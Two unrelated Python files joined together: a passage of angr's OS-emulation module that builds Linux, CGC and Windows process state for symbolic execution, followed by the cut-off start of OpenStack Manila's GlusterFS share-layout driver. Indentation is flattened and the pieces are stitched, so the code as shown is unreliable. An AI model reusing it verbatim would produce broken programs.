if not allow_unsupported and not self.syscall_library:
raise AngrUnsupportedSyscallError("%s does not have a library of syscalls implemented", self.name)
addr = number + self.kernel_base
if self.syscall_library is None:
proc = P['stubs']['syscall']()
elif not allow_unsupported and not self.syscall_library.has_implementation(number, self.arch):
raise AngrUnsupportedSyscallError("No implementation for syscall %d" % number)
else:
proc = self.syscall_library.get(number, self.arch)
proc.addr = addr
return proc
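# A short sketch of the syscall address <-> number mapping used above: syscall numbers
# are plain offsets from the CLE kernel object's mapped base, so round-tripping through
# syscall_from_addr() recovers the same address. Assumes configure_project() has run
# and that number is small enough to fall inside the pseudo-kernel window.
def _example_syscall_roundtrip(simuserland, number):
    # Illustrative only.
    addr = number + simuserland.kernel_base
    proc = simuserland.syscall_from_addr(addr)
    return simuserland.is_syscall_addr(addr), proc is not None and proc.addr == addr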
class SimLinux(SimUserland):
"""
OS-specific configuration for \\*nix-y OSes.
"""
def __init__(self, project, **kwargs):
super(SimLinux, self).__init__(project, syscall_library=L['linux'], name="Linux", **kwargs)
self._loader_addr = None
self._loader_lock_addr = None
self._loader_unlock_addr = None
self._error_catch_tsd_addr = None
self._vsyscall_addr = None
def configure_project(self):
super(SimLinux, self).configure_project()
self._loader_addr = self.project.loader.extern_object.allocate()
self._loader_lock_addr = self.project.loader.extern_object.allocate()
self._loader_unlock_addr = self.project.loader.extern_object.allocate()
self._error_catch_tsd_addr = self.project.loader.extern_object.allocate()
self._vsyscall_addr = self.project.loader.extern_object.allocate()
self.project.hook(self._loader_addr, P['linux_loader']['LinuxLoader']())
self.project.hook(self._loader_lock_addr, P['linux_loader']['_dl_rtld_lock_recursive']())
self.project.hook(self._loader_unlock_addr, P['linux_loader']['_dl_rtld_unlock_recursive']())
self.project.hook(self._error_catch_tsd_addr, P['linux_loader']['_dl_initial_error_catch_tsd'](static_addr=self.project.loader.extern_object.allocate()))
self.project.hook(self._vsyscall_addr, P['linux_kernel']['_vsyscall']())
ld_obj = self.project.loader.linux_loader_object
if ld_obj is not None:
# there are some functions we MUST use the simprocedures for, regardless of what the user wants
self._weak_hook_symbol('__tls_get_addr', L['ld.so'].get('__tls_get_addr', self.arch), ld_obj)
self._weak_hook_symbol('___tls_get_addr', L['ld.so'].get('___tls_get_addr', self.arch), ld_obj)
# set up some static data in the loader object...
_rtld_global = ld_obj.get_symbol('_rtld_global')
if _rtld_global is not None:
if isinstance(self.project.arch, ArchAMD64):
self.project.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF08, self._loader_lock_addr)
self.project.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0xF10, self._loader_unlock_addr)
self.project.loader.memory.write_addr_at(_rtld_global.rebased_addr + 0x990, self._error_catch_tsd_addr)
# TODO: what the hell is this
_rtld_global_ro = ld_obj.get_symbol('_rtld_global_ro')
if _rtld_global_ro is not None:
pass
tls_obj = self.project.loader.tls_object
if tls_obj is not None:
if isinstance(self.project.arch, ArchAMD64):
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x28, 0x5f43414e4152595f)
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x30, 0x5054524755415244)
elif isinstance(self.project.arch, ArchX86):
self.project.loader.memory.write_addr_at(tls_obj.thread_pointer + 0x10, self._vsyscall_addr)
elif isinstance(self.project.arch, ArchARM):
self.project.hook(0xffff0fe0, P['linux_kernel']['_kernel_user_helper_get_tls']())
# Only set up ifunc resolution if we are using the ELF backend on AMD64
if isinstance(self.project.loader.main_object, MetaELF):
if isinstance(self.project.arch, ArchAMD64):
for binary in self.project.loader.all_objects:
if not isinstance(binary, MetaELF):
continue
for reloc in binary.relocs:
if reloc.symbol is None or reloc.resolvedby is None:
continue
try:
if reloc.resolvedby.elftype != 'STT_GNU_IFUNC':
continue
except AttributeError:
continue
gotaddr = reloc.rebased_addr
gotvalue = self.project.loader.memory.read_addr_at(gotaddr)
if self.project.is_hooked(gotvalue):
continue
# Replace it with a ifunc-resolve simprocedure!
kwargs = {
'funcaddr': gotvalue,
'gotaddr': gotaddr,
'funcname': reloc.symbol.name
}
# TODO: should this be replaced with hook_symbol?
randaddr = self.project.loader.extern_object.allocate()
self.project.hook(randaddr, P['linux_loader']['IFuncResolver'](**kwargs))
self.project.loader.memory.write_addr_at(gotaddr, randaddr)
# pylint: disable=arguments-differ
def state_blank(self, fs=None, concrete_fs=False, chroot=None, **kwargs):
state = super(SimLinux, self).state_blank(**kwargs)
if self.project.loader.tls_object is not None:
if isinstance(state.arch, ArchAMD64):
state.regs.fs = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchX86):
state.regs.gs = self.project.loader.tls_object.user_thread_pointer >> 16
elif isinstance(state.arch, (ArchMIPS32, ArchMIPS64)):
state.regs.ulr = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchPPC32):
state.regs.r2 = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchPPC64):
state.regs.r13 = self.project.loader.tls_object.user_thread_pointer
elif isinstance(state.arch, ArchAArch64):
state.regs.tpidr_el0 = self.project.loader.tls_object.user_thread_pointer
last_addr = self.project.loader.main_object.max_addr
brk = last_addr - last_addr % 0x1000 + 0x1000
state.register_plugin('posix', SimStateSystem(fs=fs, concrete_fs=concrete_fs, chroot=chroot, brk=brk))
if self.project.loader.main_object.is_ppc64_abiv1:
state.libc.ppc64_abiv = 'ppc64_1'
return state
def state_entry(self, args=None, env=None, argc=None, **kwargs):
state = super(SimLinux, self).state_entry(**kwargs)
# Handle default values
if args is None:
args = []
if env is None:
env = {}
# Prepare argc
if argc is None:
argc = claripy.BVV(len(args), state.arch.bits)
elif type(argc) in (int, long): # pylint: disable=unidiomatic-typecheck
argc = claripy.BVV(argc, state.arch.bits)
# Make string table for args/env/auxv
table = StringTableSpec()
# Add args to string table
for arg in args:
table.add_string(arg)
table.add_null()
# Add environment to string table
for k, v in env.iteritems():
if type(k) is str: # pylint: disable=unidiomatic-typecheck
k = claripy.BVV(k)
elif type(k) is unicode: # pylint: disable=unidiomatic-typecheck
k = claripy.BVV(k.encode('utf-8'))
elif isinstance(k, claripy.ast.Bits):
pass
else:
raise TypeError("Key in env must be either string or bitvector")
if type(v) is str: # pylint: disable=unidiomatic-typecheck
v = claripy.BVV(v)
elif type(v) is unicode: # pylint: disable=unidiomatic-typecheck
v = claripy.BVV(v.encode('utf-8'))
elif isinstance(v, claripy.ast.Bits):
pass
else:
raise TypeError("Value in env must be either string or bitvector")
table.add_string(k.concat(claripy.BVV('='), v))
table.add_null()
# Prepare the auxiliary vector and add it to the end of the string table
# TODO: Actually construct a real auxiliary vector
# current vector is an AT_RANDOM entry where the "random" value is 0xaec0aec0aec0...
aux = [(25, ("AEC0"*8).decode('hex'))]
for a, b in aux:
table.add_pointer(a)
if isinstance(b, str):
table.add_string(b)
else:
table.add_pointer(b)
table.add_null()
table.add_null()
# Dump the table onto the stack, calculate pointers to args, env, and auxv
state.memory.store(state.regs.sp - 16, claripy.BVV(0, 8*16))
argv = table.dump(state, state.regs.sp - 16)
envp = argv + ((len(args) + 1) * state.arch.bytes)
auxv = argv + ((len(args) + len(env) + 2) * state.arch.bytes)
# Put argc on stack and fix the stack pointer
newsp = argv - state.arch.bytes
state.memory.store(newsp, argc, endness=state.arch.memory_endness)
state.regs.sp = newsp
if state.arch.name in ('PPC32',):
state.stack_push(claripy.BVV(0, 32))
state.stack_push(claripy.BVV(0, 32))
state.stack_push(claripy.BVV(0, 32))
state.stack_push(claripy.BVV(0, 32))
# store argc argv envp auxv in the posix plugin
state.posix.argv = argv
state.posix.argc = argc
state.posix.environ = envp
state.posix.auxv = auxv
self.set_entry_register_values(state)
return state
def set_entry_register_values(self, state):
for reg, val in state.arch.entry_register_values.iteritems():
if isinstance(val, (int, long)):
state.registers.store(reg, val, size=state.arch.bytes)
elif isinstance(val, (str,)):
if val == 'argc':
state.registers.store(reg, state.posix.argc, size=state.arch.bytes)
elif val == 'argv':
state.registers.store(reg, state.posix.argv)
elif val == 'envp':
state.registers.store(reg, state.posix.environ)
elif val == 'auxv':
state.registers.store(reg, state.posix.auxv)
elif val == 'ld_destructor':
# a pointer to the dynamic linker's destructor routine, to be called at exit
# or NULL. We like NULL. It makes things easier.
state.registers.store(reg, 0)
elif val == 'toc':
if self.project.loader.main_object.is_ppc64_abiv1:
state.registers.store(reg, self.project.loader.main_object.ppc64_initial_rtoc)
elif val == 'thread_pointer':
state.registers.store(reg, self.project.loader.tls_object.user_thread_pointer)
else:
l.warning('Unknown entry point register value indicator "%s"', val)
else:
l.error('What the ass kind of default value is %s?', val)
def state_full_init(self, **kwargs):
kwargs['addr'] = self._loader_addr
return super(SimLinux, self).state_full_init(**kwargs)
def prepare_function_symbol(self, symbol_name, basic_addr=None):
"""
Prepare the address space with the data necessary to perform relocations pointing to the given symbol.
Returns a 2-tuple. The first item is the address of the function code, the second is the address of the
relocation target.
"""
if self.project.loader.main_object.is_ppc64_abiv1:
if basic_addr is not None:
pointer = self.project.loader.memory.read_addr_at(basic_addr)
return pointer, basic_addr
pseudo_hookaddr = self.project.loader.extern_object.get_pseudo_addr(symbol_name)
pseudo_toc = self.project.loader.extern_object.allocate(size=0x18)
self.project.loader.extern_object.memory.write_addr_at(AT.from_mva(pseudo_toc, self.project.loader.extern_object).to_rva(), pseudo_hookaddr)
return pseudo_hookaddr, pseudo_toc
else:
if basic_addr is None:
basic_addr = self.project.loader.extern_object.get_pseudo_addr(symbol_name)
return basic_addr, basic_addr
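# A compact sketch of the pointer arithmetic state_entry() uses when laying out the
# initial stack: argc sits at the new stack pointer, argv immediately above it, envp
# starts after argv's terminating NULL, and auxv after envp's terminating NULL.
def _example_initial_stack_offsets(argv_ptr, argc, envc, word_size):
    # Illustrative only: mirrors the envp/auxv computation in SimLinux.state_entry above.
    envp = argv_ptr + (argc + 1) * word_size
    auxv = argv_ptr + (argc + envc + 2) * word_size
    return envp, auxv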
class SimCGC(SimUserland):
"""
Environment configuration for the CGC DECREE platform
"""
def __init__(self, project, **kwargs):
super(SimCGC, self).__init__(project, syscall_library=L['cgcabi'], name="CGC", **kwargs)
# pylint: disable=arguments-differ
def state_blank(self, fs=None, **kwargs):
s = super(SimCGC, self).state_blank(**kwargs) # pylint:disable=invalid-name
# Special stack base for CGC binaries to work with Shellphish CRS
s.regs.sp = 0xbaaaaffc
# Map the special cgc memory
if o.ABSTRACT_MEMORY not in s.options:
s.memory.mem._preapproved_stack = IRange(0xbaaab000 - 1024*1024*8, 0xbaaab000)
s.memory.map_region(0x4347c000, 4096, 1)
s.register_plugin('posix', SimStateSystem(fs=fs))
# Create the CGC plugin
s.get_plugin('cgc')
# set up the address for concrete transmits
s.unicorn.transmit_addr = self.syscall_from_number(2).addr
return s
def state_entry(self, **kwargs):
if isinstance(self.project.loader.main_object, BackedCGC):
kwargs['permissions_backer'] = (True, self.project.loader.main_object.permissions_map)
kwargs['add_options'] = {o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY} | kwargs.get('add_options', set())
state = super(SimCGC, self).state_entry(**kwargs)
if isinstance(self.project.loader.main_object, BackedCGC):
for reg, val in self.project.loader.main_object.initial_register_values():
if reg in state.arch.registers:
setattr(state.regs, reg, val)
elif reg == 'eflags':
pass
elif reg == 'fctrl':
state.regs.fpround = (val & 0xC00) >> 10
elif reg == 'fstat':
state.regs.fc3210 = (val & 0x4700)
elif reg == 'ftag':
empty_bools = [((val >> (x*2)) & 3) == 3 for x in xrange(8)]
tag_chars = [claripy.BVV(0 if x else 1, 8) for x in empty_bools]
for i, tag in enumerate(tag_chars):
setattr(state.regs, 'fpu_t%d' % i, tag)
elif reg in ('fiseg', 'fioff', 'foseg', 'fooff', 'fop'):
pass
elif reg == 'mxcsr':
state.regs.sseround = (val & 0x600) >> 9
else:
l.error("What is this register %s I have to translate?", reg)
# Update allocation base
state.cgc.allocation_base = self.project.loader.main_object.current_allocation_base
# Do all the writes
writes_backer = self.project.loader.main_object.writes_backer
stdout = 1
for size in writes_backer:
if size == 0:
continue
str_to_write = state.posix.files[1].content.load(state.posix.files[1].pos, size)
a = SimActionData(state, 'file_1_0', 'write', addr=claripy.BVV(state.posix.files[1].pos, state.arch.bits), data=str_to_write, size=size)
state.posix.write(stdout, str_to_write, size)
state.history.add_action(a)
else:
# Set CGC-specific variables
state.regs.eax = 0
state.regs.ebx = 0
state.regs.ecx = 0x4347c000
state.regs.edx = 0
state.regs.edi = 0
state.regs.esi = 0
state.regs.esp = 0xbaaaaffc
state.regs.ebp = 0
state.regs.cc_dep1 = 0x202 # default eflags
state.regs.cc_op = 0 # OP_COPY
state.regs.cc_dep2 = 0 # doesn't matter
state.regs.cc_ndep = 0 # doesn't matter
# fpu values
state.regs.mm0 = 0
state.regs.mm1 = 0
state.regs.mm2 = 0
state.regs.mm3 = 0
state.regs.mm4 = 0
state.regs.mm5 = 0
state.regs.mm6 = 0
state.regs.mm7 = 0
state.regs.fpu_tags = 0
state.regs.fpround = 0
state.regs.fc3210 = 0x0300
state.regs.ftop = 0
# sse values
state.regs.sseround = 0
state.regs.xmm0 = 0
state.regs.xmm1 = 0
state.regs.xmm2 = 0
state.regs.xmm3 = 0
state.regs.xmm4 = 0
state.regs.xmm5 = 0
state.regs.xmm6 = 0
state.regs.xmm7 = 0
# segmentation registers
state.regs.ds = 0
state.regs.es = 0
state.regs.fs = 0
state.regs.gs = 0
state.regs.ss = 0
state.regs.cs = 0
return state
class SimWindows(SimOS):
"""
    Environment for the Windows Win32 subsystem. Does not support syscalls currently.
"""
def __init__(self, project, **kwargs):
super(SimWindows, self).__init__(project, name='Win32', **kwargs)
self._exception_handler = None
def configure_project(self):
super(SimWindows, self).configure_project()
# here are some symbols which we MUST hook, regardless of what the user wants
self._weak_hook_symbol('GetProcAddress', L['kernel32.dll'].get('GetProcAddress', self.arch))
self._weak_hook_symbol('LoadLibraryA', L['kernel32.dll'].get('LoadLibraryA', self.arch))
self._weak_hook_symbol('LoadLibraryExW', L['kernel32.dll'].get('LoadLibraryExW', self.arch))
self._exception_handler = self.project.loader.extern_object.allocate()
self.project.hook(self._exception_handler, P['ntdll']['KiUserExceptionDispatcher']())
# pylint: disable=arguments-differ
def state_entry(self, args=None, **kwargs):
if args is None: args = []
state = super(SimWindows, self).state_entry(**kwargs)
state.regs.sp = state.regs.sp - 0x80 # give us some stack space to work with...?
return state
def state_blank(self, **kwargs):
if self.project.loader.main_object.supports_nx:
add_options = kwargs.get('add_options', set())
add_options.add(o.ENABLE_NX)
kwargs['add_options'] = add_options
state = super(SimWindows, self).state_blank(**kwargs)
# yikes!!!
fun_stuff_addr = state.libc.mmap_base
if fun_stuff_addr & 0xffff != 0:
fun_stuff_addr += 0x10000 - (fun_stuff_addr & 0xffff)
state.libc.mmap_base = fun_stuff_addr + 0x5000
state.memory.map_region(fun_stuff_addr, 0x5000, claripy.BVV(3, 3))
TIB_addr = fun_stuff_addr
PEB_addr = fun_stuff_addr + 0x1000
LDR_addr = fun_stuff_addr + 0x2000
if state.arch.name == 'X86':
state.mem[TIB_addr + 0].dword = 0 # Initial SEH frame
state.mem[TIB_addr + 4].dword = state.regs.sp # stack base (high addr)
state.mem[TIB_addr + 8].dword = state.regs.sp - 0x100000 # stack limit (low addr)
state.mem[TIB_addr + 0x18].dword = TIB_addr # myself!
state.mem[TIB_addr + 0x24].dword = 0xbad76ead # thread id
if self.project.loader.tls_object is not None:
state.mem[TIB_addr + 0x2c].dword = self.project.loader.tls_object.user_thread_pointer # tls array pointer
state.mem[TIB_addr + 0x30].dword = PEB_addr # PEB addr, of course
state.regs.fs = TIB_addr >> 16
state.mem[PEB_addr + 0xc].dword = LDR_addr
# OKAY IT'S TIME TO SUFFER
# http://sandsprite.com/CodeStuff/Understanding_the_Peb_Loader_Data_List.html
THUNK_SIZE = 0x100
num_pe_objects = len(self.project.loader.all_pe_objects)
ALLOC_AREA = LDR_addr + THUNK_SIZE * num_pe_objects
for i, obj in enumerate(self.project.loader.all_pe_objects):
# Create a LDR_MODULE, we'll handle the links later...
obj.module_id = i+1 # HACK HACK HACK HACK
addr = LDR_addr + (i+1) * THUNK_SIZE
state.mem[addr+0x18].dword = obj.mapped_base
state.mem[addr+0x1C].dword = obj.entry
# Allocate some space from the same region to store the paths
path = obj.binary # we're in trouble if this is None
alloc_size = len(path) * 2 + 2
tail_start = (len(path) - len(os.path.basename(path))) * 2
state.mem[addr+0x24].short = alloc_size
state.mem[addr+0x26].short = alloc_size
state.mem[addr+0x28].dword = ALLOC_AREA
state.mem[addr+0x2C].short = alloc_size - tail_start
state.mem[addr+0x2E].short = alloc_size - tail_start
state.mem[addr+0x30].dword = ALLOC_AREA + tail_start
for j, c in enumerate(path):
# if this segfaults, increase the allocation size
state.mem[ALLOC_AREA + j*2].short = ord(c)
state.mem[ALLOC_AREA + alloc_size - 2].short = 0
ALLOC_AREA += alloc_size
# handle the links. we construct a python list in the correct order for each, and then, uh,
mem_order = sorted(self.project.loader.all_pe_objects, key=lambda x: x.mapped_base)
init_order = []
partially_loaded = set()
def fuck_load(x):
if x.provides in partially_loaded:
return
partially_loaded.add(x.provides)
for dep in x.deps:
if dep in self.project.loader.shared_objects:
depo = self.project.loader.shared_objects[dep]
fuck_load(depo)
init_order.append(depo)
fuck_load(self.project.loader.main_object)
load_order = [self.project.loader.main_object] + init_order
def link(a, b):
state.mem[a].dword = b
state.mem[b+4].dword = a
# I have genuinely never felt so dead in my life as I feel writing this code
def link_list(mods, offset):
if mods:
addr_a = LDR_addr + 12
addr_b = LDR_addr + THUNK_SIZE * mods[0].module_id
link(addr_a + offset, addr_b + offset)
for mod_a, mod_b in zip(mods[:-1], mods[1:]):
addr_a = LDR_addr + THUNK_SIZE * mod_a.module_id
addr_b = LDR_addr + THUNK_SIZE * mod_b.module_id
link(addr_a + offset, addr_b + offset)
addr_a = LDR_addr + THUNK_SIZE * mods[-1].module_id
addr_b = LDR_addr + 12
link(addr_a + offset, addr_b + offset)
else:
link(LDR_addr + 12, LDR_addr + 12)
link_list(load_order, 0)
link_list(mem_order, 8)
link_list(init_order, 16)
return state
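    # Note on the three link_list() calls at the end of state_blank() above (a
    # best-effort reading, not verified against a reference layout): the offsets 0, 8
    # and 16 relative to LDR_addr + 12 are wired up as the in-load-order,
    # in-memory-order and in-initialization-order module lists of the PEB loader data,
    # each as a circular doubly linked list of the fake LDR_MODULE thunks built above.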
def handle_exception(self, successors, engine, exc_type, exc_value, exc_traceback):
if engine is not self.project.factory.default_engine:
raise exc_type, exc_value, exc_traceback
# we'll need to wind up to the exception to get the correct state to resume from...
# exc will be a SimError, for sure
# executed_instruction_count is incremented when we see an imark BUT it starts at -1, so this is the correct val
num_inst = exc_value.executed_instruction_count
if num_inst >= 1:
# scary...
try:
# what would marking this as "inline" do?
r = self.project.factory.default_engine.process(successors.initial_state, num_inst=num_inst)
if len(r.flat_successors) != 1:
l.error("Got %d successors while re-executing %d instructions at %#x for exception windup", num_inst, successors.initial_state.addr)
raise exc_type, exc_value, exc_traceback
exc_state = r.flat_successors[0]
except:
# lol no
l.error("Got some weirdo error while re-executing %d instructions at %#x for exception windup", num_inst, successors.initial_state.addr)
raise exc_type, exc_value, exc_traceback
else:
# duplicate the history-cycle code here...
exc_state = successors.initial_state.copy()
exc_state.register_plugin('history', successors.initial_state.history.make_child())
exc_state.history.recent_bbl_addrs.append(successors.initial_state.addr)
# first check that we actually have an exception handler
# we check is_true since if it's symbolic this is exploitable maybe?
tib_addr = exc_state.regs._fs.concat(exc_state.solver.BVV(0, 16))
if exc_state.solver.is_true(exc_state.mem[tib_addr].long.resolved == -1):
exc_value.args = ('Unhandled exception: %s' % exc_value,)
raise exc_type, exc_value, exc_traceback
# catch nested exceptions here with magic value
if exc_state.solver.is_true(exc_state.mem[tib_addr].long.resolved == 0xBADFACE):
exc_value.args = ('Unhandled exception: %s' % exc_value,)
raise exc_type, exc_value, exc_traceback
# serialize the thread context and set up the exception record...
self._dump_regs(exc_state, exc_state.regs._esp - 0x300)
exc_state.regs.esp -= 0x400
record = exc_state.regs._esp + 0x20
context = exc_state.regs._esp + 0x100
exc_state.mem[record + 0x4].uint32_t = 0 # flags = continuable
exc_state.mem[record + 0x8].uint32_t = 0 # FUCK chained exceptions
exc_state.mem[record + 0xc].uint32_t = exc_state.regs._eip # exceptionaddress
for i in xrange(16): # zero out the arg count and args array
exc_state.mem[record + 0x10 + 4*i].uint32_t = 0
# TOTAL SIZE: 0x50
# the rest of the parameters have to be set per-exception type
if exc_type is SimSegfaultError:
exc_state.mem[record].uint32_t = 0xc0000005 # EXCEPTION_ACCESS_VIOLATION
exc_state.mem[record + 0x10].uint32_t = 2
exc_state.mem[record + 0x14].uint32_t = 1 if exc_value.reason.startswith('write-') else 0
exc_state.mem[record + 0x18].uint32_t = exc_value.addr
# set up parameters to userland dispatcher
exc_state.mem[exc_state.regs._esp].uint32_t = 0xBADC0DE # god help us if we return from this func
exc_state.mem[exc_state.regs._esp + 4].uint32_t = record
exc_state.mem[exc_state.regs._esp + 8].uint32_t = context
# let's go let's go!
successors.add_successor(exc_state, self._exception_handler, exc_state.solver.true, 'Ijk_Exception')
successors.processed = True
# these two methods load and store register state from a struct CONTEXT
# https://www.nirsoft.net/kernel_struct/vista/CONTEXT.html
@staticmethod
def _dump_regs(state, addr):
if state.arch.name != 'X86':
raise SimUnsupportedError("I don't know how to work with struct CONTEXT outside of i386")
# I decline to load and store the floating point/extended registers
state.mem[addr + 0].uint32_t = 0x07 # contextflags = control | integer | segments
# dr0 - dr7 are at 0x4-0x18
# fp state is at 0x1c: 8 ulongs plus a char[80] gives it size 0x70
state.mem[addr + 0x8c].uint32_t = state.regs.gs.concat(state.solver.BVV(0, 16))
state.mem[addr + 0x90].uint32_t = state.regs.fs.concat(state.solver.BVV(0, 16))
state.mem[addr + 0x94].uint32_t = 0 # es
state.mem[addr + 0x98].uint32_t = 0 # ds
state.mem[addr + 0x9c].uint32_t = state.regs.edi
state.mem[addr + 0xa0].uint32_t = state.regs.esi
state.mem[addr + 0xa4].uint32_t = state.regs.ebx
state.mem[addr + 0xa8].uint32_t = state.regs.edx
state.mem[addr + 0xac].uint32_t = state.regs.ecx
state.mem[addr + 0xb0].uint32_t = state.regs.eax
state.mem[addr + 0xb4].uint32_t = state.regs.ebp
state.mem[addr + 0xb8].uint32_t = state.regs.eip
state.mem[addr + 0xbc].uint32_t = 0 # cs
state.mem[addr + 0xc0].uint32_t = state.regs.eflags
state.mem[addr + 0xc4].uint32_t = state.regs.esp
state.mem[addr + 0xc8].uint32_t = 0 # ss
# and then 512 bytes of extended registers
# TOTAL SIZE: 0x2cc
@staticmethod
def _load_regs(state, addr):
if state.arch.name != 'X86':
raise SimUnsupportedError("I don't know how to work with struct CONTEXT outside of i386")
# TODO: check contextflags to see what parts to deserialize
state.regs.gs = state.mem[addr + 0x8c].uint32_t.resolved[31:16]
state.regs.fs = state.mem[addr + 0x90].uint32_t.resolved[31:16]
state.regs.edi = state.mem[addr + 0x9c].uint32_t.resolved
state.regs.esi = state.mem[addr + 0xa0].uint32_t.resolved
state.regs.ebx = state.mem[addr + 0xa4].uint32_t.resolved
state.regs.edx = state.mem[addr + 0xa8].uint32_t.resolved
state.regs.ecx = state.mem[addr + 0xac].uint32_t.resolved
state.regs.eax = state.mem[addr + 0xb0].uint32_t.resolved
state.regs.ebp = state.mem[addr + 0xb4].uint32_t.resolved
state.regs.eip = state.mem[addr + 0xb8].uint32_t.resolved
state.regs.eflags = state.mem[addr + 0xc0].uint32_t.resolved
state.regs.esp = state.mem[addr + 0xc4].uint32_t.resolved
os_mapping = defaultdict(lambda: SimOS)
def register_simos(name, cls):
os_mapping[name] = cls
register_simos('unix', SimLinux)
register_simos('windows', SimWindows)
register_simos('cgc', SimCGC)
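# A hedged sketch of how a downstream project could plug its own OS model into the
# os_mapping registry above; _ExampleEmbeddedOS is purely hypothetical and only renames
# the default behaviour inherited from SimOS.
class _ExampleEmbeddedOS(SimOS):
    def __init__(self, project, **kwargs):
        super(_ExampleEmbeddedOS, self).__init__(project, name='ExampleRTOS', **kwargs)
# Registering it would make loader backends reporting os == 'example_rtos' use it:
# register_simos('example_rtos', _ExampleEmbeddedOS)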
|
|
# Copyright (c) 2015 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""GlusterFS volume mapped share layout."""
import os
import random
import re
import shutil
import string
import tempfile
import xml.etree.cElementTree as etree
from oslo_config import cfg
from oslo_log import log
import six
from manila import exception
from manila.i18n import _
from manila.share.drivers.glusterfs import common
from manila.share.drivers.glusterfs import layout
from manila import utils
LOG = log.getLogger(__name__)
glusterfs_volume_mapped_opts = [
cfg.ListOpt('glusterfs_servers',
default=[],
deprecated_name='glusterfs_targets',
help='List of GlusterFS servers that can be used to create '
'shares. Each GlusterFS server should be of the form '
'[remoteuser@]<volserver>, and they are assumed to '
'belong to distinct Gluster clusters.'),
cfg.StrOpt('glusterfs_volume_pattern',
help='Regular expression template used to filter '
'GlusterFS volumes for share creation. '
'The regex template can optionally (i.e. with support '
'of the GlusterFS backend) contain the #{size} '
'parameter which matches an integer (sequence of '
'digits) in which case the value shall be interpreted as '
'size of the volume in GB. Examples: '
'"manila-share-volume-\d+$", '
'"manila-share-volume-#{size}G-\d+$"; '
'with matching volume names, respectively: '
'"manila-share-volume-12", "manila-share-volume-3G-13". '
'In the latter example, the number that matches "#{size}", '
'that is, 3, is an indication that the size of volume '
'is 3G.'),
]
CONF = cfg.CONF
CONF.register_opts(glusterfs_volume_mapped_opts)
# The dict specifying named parameters
# that can be used with glusterfs_volume_pattern
# in #{<param>} format.
# For each of them we give regex pattern it matches
# and a transformer function ('trans') for the matched
# string value.
# Currently we handle only #{size}.
PATTERN_DICT = {'size': {'pattern': '(?P<size>\d+)', 'trans': int}}
USER_MANILA_SHARE = 'user.manila-share'
USER_CLONED_FROM = 'user.manila-cloned-from'
UUID_RE = re.compile('\A[\da-f]{8}-([\da-f]{4}-){3}[\da-f]{12}\Z', re.I)
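# Illustrative sketch (values are hypothetical): UUID_RE decides whether the
# 'user.manila-share' volume option already holds a share id, i.e. whether a
# volume is bound to a share.
#
#     >>> bool(UUID_RE.search('9a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d'))
#     True
#     >>> bool(UUID_RE.search('NONE'))   # value written back on delete_share
#     False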
class GlusterfsVolumeMappedLayout(layout.GlusterfsShareLayoutBase):
_snapshots_are_supported = True
def __init__(self, driver, *args, **kwargs):
super(GlusterfsVolumeMappedLayout, self).__init__(
driver, *args, **kwargs)
self.gluster_used_vols = set()
self.configuration.append_config_values(
common.glusterfs_common_opts)
self.configuration.append_config_values(
glusterfs_volume_mapped_opts)
self.gluster_nosnap_vols_dict = {}
self.volume_pattern = self._compile_volume_pattern()
self.volume_pattern_keys = self.volume_pattern.groupindex.keys()
for srvaddr in self.configuration.glusterfs_servers:
# format check for srvaddr
self._glustermanager(srvaddr, False)
self.glusterfs_versions = {}
self.private_storage = kwargs.get('private_storage')
def _compile_volume_pattern(self):
"""Compile a RegexObject from the config specified regex template.
(cfg.glusterfs_volume_pattern)
"""
subdict = {}
for key, val in PATTERN_DICT.items():
subdict[key] = val['pattern']
# Using templates with placeholder syntax #{<var>}
class CustomTemplate(string.Template):
delimiter = '#'
volume_pattern = CustomTemplate(
self.configuration.glusterfs_volume_pattern).substitute(
subdict)
return re.compile(volume_pattern)
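# Illustrative sketch of the substitution above, assuming the (hypothetical)
# config value 'manila-share-volume-#{size}G-\d+$': the '#{size}' placeholder
# is replaced with PATTERN_DICT's '(?P<size>\d+)', yielding
#
#     manila-share-volume-(?P<size>\d+)G-\d+$
#
# so the compiled pattern exposes a 'size' named group, which
# _fetch_gluster_volumes() later converts to int via PATTERN_DICT's 'trans'.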
def do_setup(self, context):
"""Setup the GlusterFS volumes."""
glusterfs_versions, exceptions = {}, {}
for srvaddr in self.configuration.glusterfs_servers:
try:
glusterfs_versions[srvaddr] = self._glustermanager(
srvaddr, False).get_gluster_version()
except exception.GlusterfsException as exc:
exceptions[srvaddr] = six.text_type(exc)
if exceptions:
for srvaddr, excmsg in exceptions.items():
LOG.error("'gluster version' failed on server "
"%(server)s with: %(message)s",
{'server': srvaddr, 'message': excmsg})
raise exception.GlusterfsException(_(
"'gluster version' failed on servers %s") % (
','.join(exceptions.keys())))
notsupp_servers = []
for srvaddr, vers in glusterfs_versions.items():
if common.numreduct(vers) < self.driver.GLUSTERFS_VERSION_MIN:
notsupp_servers.append(srvaddr)
if notsupp_servers:
gluster_version_min_str = '.'.join(
six.text_type(c) for c in self.driver.GLUSTERFS_VERSION_MIN)
for srvaddr in notsupp_servers:
LOG.error("GlusterFS version %(version)s on server "
"%(server)s is not supported, "
"minimum requirement: %(minvers)s",
{'server': srvaddr,
'version': '.'.join(glusterfs_versions[srvaddr]),
'minvers': gluster_version_min_str})
raise exception.GlusterfsException(_(
"Unsupported GlusterFS version on servers %(servers)s, "
"minimum requirement: %(minvers)s") % {
'servers': ','.join(notsupp_servers),
'minvers': gluster_version_min_str})
self.glusterfs_versions = glusterfs_versions
gluster_volumes_initial = set(
self._fetch_gluster_volumes(filter_used=False))
if not gluster_volumes_initial:
# No suitable volumes are found on the Gluster end.
# Raise exception.
msg = (_("Gluster backend does not provide any volume "
"matching pattern %s"
) % self.configuration.glusterfs_volume_pattern)
